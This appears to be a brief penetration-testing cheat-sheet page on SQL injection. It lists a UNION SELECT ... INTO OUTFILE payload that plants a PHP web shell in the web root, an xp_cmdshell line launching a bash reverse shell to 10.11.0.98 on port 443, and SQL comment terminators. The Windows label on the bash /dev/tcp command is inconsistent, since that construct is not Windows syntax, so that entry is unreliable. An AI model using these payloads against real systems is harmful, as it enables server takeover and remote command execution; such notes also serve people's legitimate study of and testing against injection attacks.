SQL Injection

SQL reverse shells

UNION SELECT '<?php system($_GET["cmd"]); ?>' FROM mytable INTO OUTFILE '/var/www/html/shell.php'

If the target system is Windows and uses MS SQL

EXEC xp_cmdshell '/bin/bash -i >& /dev/tcp/10.11.0.98/443 0>&1'

Comments

;#
;--
PreviousLFI/RFINextCVE2009-3103

Last updated